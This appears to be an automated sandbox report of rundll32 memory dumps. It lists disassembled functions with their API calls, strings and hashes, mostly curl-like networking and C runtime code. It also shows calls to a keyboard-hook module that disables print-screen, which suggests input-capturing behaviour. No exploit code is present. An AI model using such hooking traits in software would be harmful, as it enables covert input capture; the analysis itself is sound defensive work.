__lock.LIBCMT ref: 04ED9B64
__updatetlocinfoEx_nolock.LIBCMT ref: 04ED9B78

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 6a9798e87dc26082d62b6078ee7b49e91b9a0c114d879d978f5a671bf476529c
Instruction ID: d8b4b8b489c296a981924e357de215d41eef86cf8b0584126141c01989e29d68
Opcode Fuzzy Hash: 6a9798e87dc26082d62b6078ee7b49e91b9a0c114d879d978f5a671bf476529c
Instruction Fuzzy Hash: 74F090729047209AF721BB688C05B5D73D0AF0072CF167109D441AB1D2CB34B943DA5A

Function 6D010000 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 373networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 6D01036B
setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 6D010387

Strings

Failed to alloc scratch buffer, xrefs: 6D010226
We are completely uploaded and fine, xrefs: 6D010477

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Ioctlsetsockopt
String ID: Failed to alloc scratch buffer$We are completely uploaded and fine
API String ID: 1903391676-2419666956
Opcode ID: 751411822659a96b36297e5f4529e387c09c6d1e35752938d05b3d46d93213ab
Instruction ID: e87b083277dcabc5e0798db3f720570fe4a19fd3e33565c1ddef7bf68e95266a
Opcode Fuzzy Hash: 751411822659a96b36297e5f4529e387c09c6d1e35752938d05b3d46d93213ab
Instruction Fuzzy Hash: 08E18E7160CB429FE321CF79C880BABB7E5BF89304F44092DE5EA87242E731A555CB52

Function 6D00B7A0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 367networkCOMMON

Download Yara Rule

APIs

Part of subcall function 6CFFEEC0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,6CFF9E6C,?,00000000,00000000,00000008,6CFF1FE0,00000000), ref: 6CFFEED3
Part of subcall function 6CFFEEC0: __alldvrm.LIBCMT ref: 6CFFEEED
Part of subcall function 6CFFEEC0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CFFEF14

WSASetLastError.WS2_32(?,?), ref: 6D00BA41

Strings

Connection timeout after %ld ms, xrefs: 6D00BBE3
Failed to connect to %s port %u after %I64d ms: %s, xrefs: 6D00BB8B
%s connect timeout after %I64dms, move on!, xrefs: 6D00B8BC

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CounterErrorLastPerformanceQueryUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
String ID: %s connect timeout after %I64dms, move on!$Connection timeout after %ld ms$Failed to connect to %s port %u after %I64d ms: %s
API String ID: 4159349166-2476235426
Opcode ID: 688f377af69d92c6d3a3070848cb93087da5d01c975efe2417ce22d991fc83ab
Instruction ID: b1d5deae20c3a75186e38e9c7d396004be4770217d6f94f93834e3bb2402dbf0
Opcode Fuzzy Hash: 688f377af69d92c6d3a3070848cb93087da5d01c975efe2417ce22d991fc83ab
Instruction Fuzzy Hash: 04D19D70A08745AFF721DF28C440B6BBBE0FF85308F45495DE99997212E7B1E984CB92

Function 6CFFB1CC Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 349COMMON

Download Yara Rule

APIs

?UnInstallKBHook@@YAHXZ.HKEYBOARD(?,?,operation aborted by pre-request callback), ref: 6CFFB24F
?UnInstallKBHook@@YAHXZ.HKEYBOARD ref: 6CFFB3C9
?UnInstallKBHook@@YAHXZ.HKEYBOARD ref: 6CFFB450

Strings

operation aborted by pre-request callback, xrefs: 6CFFB23A

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Hook@@Install
String ID: operation aborted by pre-request callback
API String ID: 3523473461-1824986975
Opcode ID: 37dc414b4effa8123842ee616328221457dbec7071146ed167499b031478ac7a
Instruction ID: 9f47d74f30dcef736ec06494dc7dd27e1f7c29b113b5396df67ddf1757203d4a
Opcode Fuzzy Hash: 37dc414b4effa8123842ee616328221457dbec7071146ed167499b031478ac7a
Instruction Fuzzy Hash: B6C103315097409FE321CF25C884B9B77E4EF42318F240E1DE5B997AA1DB71E14ACB92

Function 6D025EA0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 159networkCOMMON

Download Yara Rule

APIs

Part of subcall function 6D0432A0: WSAGetLastError.WS2_32 ref: 6D043361

WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Ctrl conn has data while waiting for data conn), ref: 6D025FF1

Strings

We got a 421 - timeout, xrefs: 6D026013
FTP response timeout, xrefs: 6D02603E
FTP response aborted due to select/poll error: %d, xrefs: 6D025FF8

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID: FTP response aborted due to select/poll error: %d$FTP response timeout$We got a 421 - timeout
API String ID: 1452528299-3016466939
Opcode ID: 1ee5c03dd7f98e878a99b5eb44a2cf003aade32a93c9bdcfd74cd7ba62cf888f
Instruction ID: 16cfe2ad8f70591dff38cfe3eb76c1ac3756fb73259bcd0f180547ecb59072c7
Opcode Fuzzy Hash: 1ee5c03dd7f98e878a99b5eb44a2cf003aade32a93c9bdcfd74cd7ba62cf888f
Instruction Fuzzy Hash: 3B4102796093019BF3008A19D884BBB73E4FFC9328F54417AF94887255E735D90987AA

Function 6D02F8E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,?,00000000,?), ref: 6D02F92F

Strings

TFTP error: %s, xrefs: 6D02FA6A
Received too short packet, xrefs: 6D02F971
Internal error: Unexpected packet, xrefs: 6D02FA91

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: recvfrom
String ID: Internal error: Unexpected packet$Received too short packet$TFTP error: %s
API String ID: 846543921-343195773
Opcode ID: 25c8b141b8bec3d5c61db5532a9dbfe7fc372610267ece70d5cf3b1a6fdcb539
Instruction ID: aa89ddfe5855779cebf706ed3361e0e3755e02b1c345411fe2089e770dafb4a2
Opcode Fuzzy Hash: 25c8b141b8bec3d5c61db5532a9dbfe7fc372610267ece70d5cf3b1a6fdcb539
Instruction Fuzzy Hash: 7A51F0B1908202ABF314CB25CC80FBAFBECBB45349F05462AF95DD6142E775E518CBA1

Function 6D035CF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 141networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32(?,?,?), ref: 6D035DF4
WSAGetLastError.WS2_32 ref: 6D035DFE

Part of subcall function 6D00AF50: htons.WS2_32(?), ref: 6D00AF8C

Part of subcall function 6D01A850: GetLastError.KERNEL32(?,00000000,?,6D008B2F,00000000,?,00000100,?,?,?,?,?,?,?), ref: 6D01A853

Strings

ssrem inet_ntop() failed with errno %d: %s, xrefs: 6D035E6D
getpeername() failed with errno %d: %s, xrefs: 6D035E1B

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast$getpeernamehtons
String ID: getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
API String ID: 4212301432-4047410615
Opcode ID: 41af5b0bb759e1e80113c4f0666ceb4d5035b79c6ec333eda30241446925cc79
Instruction ID: 2fc56db78a1acc5dcd28f573b1791ae3476201fb7c342a06ce331428bedf1df5
Opcode Fuzzy Hash: 41af5b0bb759e1e80113c4f0666ceb4d5035b79c6ec333eda30241446925cc79
Instruction Fuzzy Hash: FD51E575808205AFF711DF64CC44FFA37A8EF4A308F058568FE489B252E731A54487A2

Function 6D025C90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32 ref: 6D025CD2
accept.WS2_32(?,FFFFFFFF,?), ref: 6D025CEF

Part of subcall function 6D03EFA0: ioctlsocket.WS2_32(00000024,8004667E,00000000), ref: 6D03EFBB

Strings

Error accept()ing server connect, xrefs: 6D025D04
Connection accepted from server, xrefs: 6D025D2F

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: acceptgetsocknameioctlsocket
String ID: Connection accepted from server$Error accept()ing server connect
API String ID: 36920154-1795061160
Opcode ID: 2295b3271ea21f4e4be512ec8e1c820192286dbbeb3da04e50bfcd6fee6b95ae
Instruction ID: 230893fedba9b4860dfbfdec96f6d44ceb6501d8a9dd97928dcefe87279b4ab5
Opcode Fuzzy Hash: 2295b3271ea21f4e4be512ec8e1c820192286dbbeb3da04e50bfcd6fee6b95ae
Instruction Fuzzy Hash: 0331E675604201ABF720DF24DC81FFBB7E8FB85314F40452AF698D7181DB7595098BA2

Function 04EB1AA0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 04EB1AB6

Part of subcall function 04EB217D: std::exception::exception.LIBCMT ref: 04EB2192
Part of subcall function 04EB217D: __CxxThrowException@8.LIBCMT ref: 04EB21A7
Part of subcall function 04EB217D: std::exception::exception.LIBCMT ref: 04EB21B8

std::_Xinvalid_argument.LIBCPMT ref: 04EB1AED

Part of subcall function 04EB2130: std::exception::exception.LIBCMT ref: 04EB2145
Part of subcall function 04EB2130: __CxxThrowException@8.LIBCMT ref: 04EB215A
Part of subcall function 04EB2130: std::exception::exception.LIBCMT ref: 04EB216B

Strings

invalid string position, xrefs: 04EB1AB1
string too long, xrefs: 04EB1AE8

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1823113695-4289949731
Opcode ID: 3358d523a98d17f5f8b844d131bf4ae1a4c35ad522d7e43a906b8a02217aec70
Instruction ID: 9401edc0c607b006548c1e3565efba1ce1a7cdc9fa82237bd5fec3a523d207b7
Opcode Fuzzy Hash: 3358d523a98d17f5f8b844d131bf4ae1a4c35ad522d7e43a906b8a02217aec70
Instruction Fuzzy Hash: E121A2323002108BC721DE6CE8A0AD7F7A9DB917F5B141A2EE2C1CB240D671F84187E5

Function 6CFF1D10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6CFF1DAF

Part of subcall function 6D04A35E: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,?,?,?,?,6CFF5117,?,6D086668,?,?,?,?,?,?), ref: 6D04A38E
Part of subcall function 6D04A35E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,6CFF5117,?,6D086668,?,?,?,?,?,?), ref: 6D04A3BE

Strings

ios_base::failbit set, xrefs: 6CFF1C48, 6CFF1D51
ios_base::eofbit set, xrefs: 6CFF1D56
ios_base::badbit set, xrefs: 6CFF1D47, 6CFF1D72, 6CFF1D93

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: DisableExceptionPrintRaiseScreen@@___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1900483484-1866435925
Opcode ID: 322e17e3b45879c3c0a045f82564d3ffeba2700b032003942d639ea74b78f8e8
Instruction ID: b9ea60667bdc304506983d789a6c04e12616b7c1b84f911f6d59292bc7504bf1
Opcode Fuzzy Hash: 322e17e3b45879c3c0a045f82564d3ffeba2700b032003942d639ea74b78f8e8
Instruction Fuzzy Hash: AF1127F2900304ABDB10CF58C801F9AB3ACEF05314F24C52AF9649BA81E772E514CBE2

Function 04EB1630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 04EB166A

Part of subcall function 04EB2130: std::exception::exception.LIBCMT ref: 04EB2145
Part of subcall function 04EB2130: __CxxThrowException@8.LIBCMT ref: 04EB215A
Part of subcall function 04EB2130: std::exception::exception.LIBCMT ref: 04EB216B

Strings

yxxx, xrefs: 04EB16C4
vector<T> too long, xrefs: 04EB1665
yxxx, xrefs: 04EB167B

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: vector<T> too long$yxxx$yxxx
API String ID: 1823113695-1517697755
Opcode ID: 71e5285a3ec3b3a527066fa607a52a7d379692879ae06fd4d3c4c7eb1dbf83e3
Instruction ID: 38317a0eb860d190426654e022820826456ff47ec56fb892ac8decaf522e0f42
Opcode Fuzzy Hash: 71e5285a3ec3b3a527066fa607a52a7d379692879ae06fd4d3c4c7eb1dbf83e3
Instruction Fuzzy Hash: 41210AB2E002055FD308CF5DD991A9BB7A9E7C8355F15066AE9459B344EA387C008BD0

Function 04EB1490 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 04EB14BE

Part of subcall function 04EB2130: std::exception::exception.LIBCMT ref: 04EB2145
Part of subcall function 04EB2130: __CxxThrowException@8.LIBCMT ref: 04EB215A
Part of subcall function 04EB2130: std::exception::exception.LIBCMT ref: 04EB216B

Strings

yxxx, xrefs: 04EB14A0
vector<T> too long, xrefs: 04EB14B9
yxxx, xrefs: 04EB14CB

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: vector<T> too long$yxxx$yxxx
API String ID: 1823113695-1517697755
Opcode ID: e844ccb78499116dc95ec8751b509f87c8bf9846c34a7b68b279084adbe53a94
Instruction ID: 457bf06dbeeec00145e08cf8fb17132020574f32ec802fe58f8b487c80f60055
Opcode Fuzzy Hash: e844ccb78499116dc95ec8751b509f87c8bf9846c34a7b68b279084adbe53a94
Instruction Fuzzy Hash: 58F0C223B000221B871C583DAD644FFE68687D03E6319A639E987CF789F820BC8192D0

Function 6D02E160 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,00000003,00000000), ref: 6D02E18D
WSAGetLastError.WS2_32 ref: 6D02E197

Strings

Sending data failed (%d), xrefs: 6D02E19E
SENT, xrefs: 6D02E1B1

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLastsend
String ID: SENT$Sending data failed (%d)
API String ID: 1802528911-3459338696
Opcode ID: af30eeaaef9318ac8ff4746b3ab1df43d608f28573854d823f8c6afb4b93428c
Instruction ID: aef11885d7774b31800761c5341b95f764a062540fe78da19ae7afbc118b83a9
Opcode Fuzzy Hash: af30eeaaef9318ac8ff4746b3ab1df43d608f28573854d823f8c6afb4b93428c
Instruction Fuzzy Hash: C6F0BB7214D341BFE302DB58DC40F6B7BB8AF4A324F14455CF2989B192D322951587A7

Function 6D04DAD2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6D04DA83,00000000,?,00000001,?,?,?,6D04DB72,00000001,FlsFree,6D07EAC0,FlsFree), ref: 6D04DADF
GetLastError.KERNEL32(?,6D04DA83,00000000,?,00000001,?,?,?,6D04DB72,00000001,FlsFree,6D07EAC0,FlsFree,00000000,?,6D04CA8F), ref: 6D04DAE9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6D04DB11

Strings

api-ms-, xrefs: 6D04DAF6

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 1ef20a109c2e55809cead6f0748976cd6ccbe4ab51624f58aaa483d75cb21a5a
Instruction ID: 8a4f5755f1b772d5a4a07f46da53108a6bde36a3f537cc4c589a9c99e06ef74c
Opcode Fuzzy Hash: 1ef20a109c2e55809cead6f0748976cd6ccbe4ab51624f58aaa483d75cb21a5a
Instruction Fuzzy Hash: 19E01A3074820AF6FF111B61DC05F6D3FB9AB43BA4F108130F90CE9096DB62E41089D4

Function 6D05E5EF Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(93BD9D6B,00000000,00000000,?), ref: 6D05E652

Part of subcall function 6D064AF8: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D0641B9,?,00000000,-00000008), ref: 6D064B59

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6D05E8A4
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D05E8EA
GetLastError.KERNEL32 ref: 6D05E98D

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 5df4c2b6d3f0b114c8cf61ea89f9d540c7887542641bed8be26c5b2427115fa7
Instruction ID: 3b27479563ebb34f14c87124f3f37ed5a805358e6a087c9c96ceefd8111ffd8a
Opcode Fuzzy Hash: 5df4c2b6d3f0b114c8cf61ea89f9d540c7887542641bed8be26c5b2427115fa7
Instruction Fuzzy Hash: A0D19D75D042599FDF01CFA8C980AADBBF5FF4A314F24452AE9A5EB341D730A911CB60

Function 6D06E223 Relevance: 6.1, APIs: 4, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,6D06DB8F), ref: 6D06E23C
?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000001,?,?), ref: 6D06E3B0
?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000002,?,?), ref: 6D06E3F6

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: DisablePrintScreen@@$DecodePointer
String ID:
API String ID: 1200762580-0
Opcode ID: f00d154e6b9ef1c2d448d188b887545cfe169808c9bade9c840f67a052dc42c8
Instruction ID: c0f6100f928369e5a133a144887c86fc11a50ea62354dbd4ff87fcd054f86aea
Opcode Fuzzy Hash: f00d154e6b9ef1c2d448d188b887545cfe169808c9bade9c840f67a052dc42c8
Instruction Fuzzy Hash: FC51487590875BCBEF008F69DD4C3AD7BB5FB46700F818055D490EA258CB3485668FA6

Function 6D05BB8A Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1cf0cf6feea0333dc13c314016054939da666dd71bbd74081955fe01c82cd84
Instruction ID: b9016653886e304f70c2d21afb34a4fa9a5b89fd61dc60a2bee74e0c29c68a03
Opcode Fuzzy Hash: d1cf0cf6feea0333dc13c314016054939da666dd71bbd74081955fe01c82cd84
Instruction Fuzzy Hash: 4A41C775A44748AFF7149F78CE41BAABFE9EB48710F108539E915DB280D7B1A550C780

Function 04ED3C47 Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtterm.LIBCMT ref: 04ED3C5B

Part of subcall function 04ED3926: _free.LIBCMT ref: 04ED9720

__init_pointers.LIBCMT ref: 04ED3D0D
__calloc_crt.LIBCMT ref: 04ED3D7B

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: __calloc_crt__init_pointers__mtterm_free
String ID:
API String ID: 3556499859-0
Opcode ID: b188500a3c1a0b6836b8d1b60a3ba4c009d566f15eabf9a274527e3b55d9f75c
